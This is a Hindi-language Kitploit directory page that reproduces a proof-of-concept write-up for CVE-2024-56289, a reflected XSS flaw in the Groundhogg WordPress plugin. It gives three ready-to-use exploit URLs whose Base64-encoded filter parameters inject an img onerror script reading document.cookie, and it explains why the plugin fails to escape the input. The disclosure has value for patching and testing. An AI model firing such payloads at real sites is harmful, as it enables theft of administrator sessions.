Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2024-56289 — Groundhogg WordPress प्लगइन में प्रतिबिंबित XSS भेद्यता के लिए प्रूफ-ऑफ-कॉन्सेप्ट एक्सप्लॉइट, जो तैयार किए गए URL पैरामीटर के माध्यम से बिना प्रमाणीकरण के स्क्रिप्ट इंजेक्शन प्रदर्शित करता है। | Kitploit
उपकरण/GitHubGitHub/dottak/cve-2024-56289
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणवेब सुरक्षापेनिट्रेशन टेस्टिंग
GitHubdottak/cve-2024-56289

CVE-2024-56289

Groundhogg WordPress प्लगइन में प्रतिबिंबित XSS भेद्यता के लिए प्रूफ-ऑफ-कॉन्सेप्ट एक्सप्लॉइट, जो तैयार किए गए URL पैरामीटर के माध्यम से बिना प्रमाणीकरण के स्क्रिप्ट इंजेक्शन प्रदर्शित करता है।

रिपॉजिटरी देखें
1 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2024-56289

1️⃣ घटक प्रकार

वर्डप्रेस प्लगइन

2️⃣ घटक विवरण

घटक का नाम WordPress CRM, Email & Marketing Automation for WordPress | Award Winner — Groundhogg

संवेदनशील संस्करण <= 3.7.3.2

घटक स्लग groundhogg

घटक लिंक https://wordpress.org/plugins/groundhogg/

3️⃣ OWASP 2017: TOP 10

भेद्यता वर्ग A3: इंजेक्शन

भेद्यता प्रकार क्रॉस साइट स्क्रिप्टिंग (XSS)

4️⃣ पूर्व-आवश्यकता

बिना प्रमाणीकरण के

5️⃣ भेद्यता विवरण

👉 संक्षिप्त विवरण

Groundhogg प्लगइन के संस्करण 3.7.3.3 और उससे नीचे में URL पैरामीटर के अपर्याप्त इनपुट सत्यापन और एस्केप प्रोसेसिंग के कारण एक रिफ्लेक्टेड क्रॉस साइट स्क्रिप्टिंग भेद्यता मौजूद है। यह भेद्यता प्लगइन डैशबोर्ड के 'Contacts', 'Funnels', और 'Logs' मेनू में खोज फ़िल्टरिंग कार्यक्षमता का उपयोग करते समय उत्पन्न होती है।

इस भेद्यता के माध्यम से, एक बिना प्रमाणीकरण वाला उपयोगकर्ता दुर्भावनापूर्ण स्क्रिप्ट वाला URL बना सकता है, और जब अन्य उपयोगकर्ता इस URL तक पहुँचते हैं, तो स्क्रिप्ट उनके ब्राउज़र में निष्पादित होती है, जिससे कुकी जानकारी का रिसाव हो सकता है। यह एक गंभीर सुरक्षा जोखिम पैदा करता है क्योंकि इसका विशेष रूप से व्यवस्थापक विशेषाधिकार वाले उपयोगकर्ताओं के सत्रों को हाईजैक करने के लिए शोषण किया जा सकता है।

👉 पुनरुत्पादन कैसे करें (PoC)

  1. 'Groundhogg' प्लगइन <=3.7.3.2 सक्रिय के साथ एक WordPress साइट तैयार करें।

    चूंकि यह प्लगइन REST API का उपयोग करता है, इसलिए Permalink को Post name पर सेट किया जाना चाहिए।

  2. इसके बाद, नीचे दिए गए प्रत्येक मेनू के लिंक तक पहुँचने से एक रिफ्लेक्टेड XSS भेद्यता ट्रिगर होगी।

    • Contacts मेनू(/wp-admin/admin.php?page=gh_contacts)

      root@kitploit:~
      http://localhost:8080/wp-admin/admin.php?page=gh_contacts&filters=W1t7ImlkIjoiIiwidHlwZSI6ImZpcnN0X25hbWUiLCJjb21wYXJlIjoiZXF1YWxzIiwidmFsdWUiOiI8aW1nIHNyYz1cInhcIiBvbmVycm9yPVwiYWxlcnQoZG9jdW1lbnQuY29va2llKVwiPiJ9XV0
      

      image

    • Funnels मेनू(/wp-admin/admin.php?page=gh_funnels)

      इस मेनू में XSS भेद्यता को पुनरुत्पादित करने के लिए, कम से कम 1 Funnel मौजूद होना चाहिए।

      root@kitploit:~
      http://localhost:8080/wp-admin/admin.php?page=gh_funnels&status=inactive&include_filters=W1t7ImlkIjoiMTBjY2FmZmUtZjE0YS00MTg5LWE0MzctYjA2MTFhMTQ2ZDk1IiwidHlwZSI6InRpdGxlIiwidmFsdWUiOiI8aW1nIHNyYz1cInhcIiBvbmVycm9yPVwiYWxlcnQoZG9jdW1lbnQuY29va2llKVwiPiIsImNvbXBhcmUiOiJlcXVhbHMifV1d
      

      image

    • Logs मेनू(/admin.php?page=gh_events)

      root@kitploit:~
      http://localhost:8080/wp-admin/admin.php?page=gh_events&tab=emails&include_filters=W1t7ImlkIjoiIiwidHlwZSI6ImZyb21fYWRkcmVzcyIsInZhbHVlIjoiPGltZyBzcmM9XCJ4XCIgb25lcnJvcj1cImFsZXJ0KGRvY3VtZW50LmNvb2tpZSlcIj4iLCJjb21wYXJlIjoiZXF1YWxzIn1dXQ
      

      image

👉 अतिरिक्त जानकारी (वैकल्पिक)

[भेद्यता का कारण]

Groundhogg प्लगइन डैशबोर्ड के 'Contacts', 'Funnels', और 'Logs' मेनू में फ़िल्टरिंग खोज करते समय, फ़िल्टरिंग सेटिंग्स को URL पैरामीटर के रूप में पारित करने से पहले Base64 एन्कोड किया जाता है।

उदाहरण के लिए, 'Contacts' मेनू में फ़िल्टरिंग खोज सेट करते समय जहाँ 'First Name' को 'Test' पर सेट किया गया है, URL पैरामीटर filters को निम्नलिखित डेटा प्राप्त होता है:

root@kitploit:~
W1t7ImlkIjoiMjM3NzdjMGItYTQ1Ni00M2JlLWExZGMtODkzN2E1MDk0M2I5IiwidHlwZSI6ImZpcnN0X25hbWUiLCJjb21wYXJlIjoiZXF1YWxzIiwidmFsdWUiOiJUZXN0In1dXQ

image

जब URL पैरामीटर filters में दर्ज मान को Base64 डिकोड किया जाता है, तो आप निम्नलिखित डेटा देख सकते हैं।

root@kitploit:~
[[{"id":"23777c0b-a456-43be-a1dc-8937a50943b9","type":"first_name","compare":"equals","value":"Test"}]]

image

जब एक फ़िल्टरिंग खोज का अनुरोध किया जाता है, तो /wp-content/plugins/groundhogg/admin/contacts/contacts-page.php फ़ाइल में Contacts_Page वर्ग का scripts फ़ंक्शन निष्पादित होता है।

इस बिंदु पर, Base64 एन्कोडेड URL पैरामीटर filters को डिकोड किया जाता है और HTTP प्रतिक्रिया के Javascript क्षेत्र में ContactSearch चर में पारित किया जाता है।

image

इसलिए, आप सत्यापित कर सकते हैं कि HTTP प्रतिक्रिया डेटा में, URL पैरामीटर filters को पारित Base64 एन्कोडेड डेटा को वितरित करने से पहले डिकोड किया जाता है।

image

इसके बाद, डिकोड किया गया डेटा JavaScript तर्क के माध्यम से फ़िल्टरिंग खोज परिणाम प्रदर्शित करने वाले DOM तत्वों में सीधे डाला जाता है।

image

इसके माध्यम से, PoC में दर्ज फ़िल्टरिंग खोज शब्द (&lt;img src="x" onerror="alert(document.cookie)"&gt;) को एस्केप प्रोसेसिंग के बिना Javascript कोड में एक चर के रूप में पारित किया जाता है और क्लाइंट तर्क द्वारा DOM तत्वों में डाला और निष्पादित किया जाता है।

image

image

परिणामस्वरूप, फ़िल्टरिंग खोज डेटा की अपर्याप्त एस्केप प्रोसेसिंग के कारण, दुर्भावनापूर्ण स्क्रिप्ट वाले मान सीधे निष्पादित किए जा सकते हैं, और यह भेद्यता सभी 'Contacts', 'Funnels', और 'Logs' मेनू में समान तरीके से उत्पन्न होती है।

6️⃣ शोषण डेमो

video

7️⃣ संदर्भ

  • https://nvd.nist.gov/vuln/detail/CVE-2024-56289
टूल डाउनलोड करें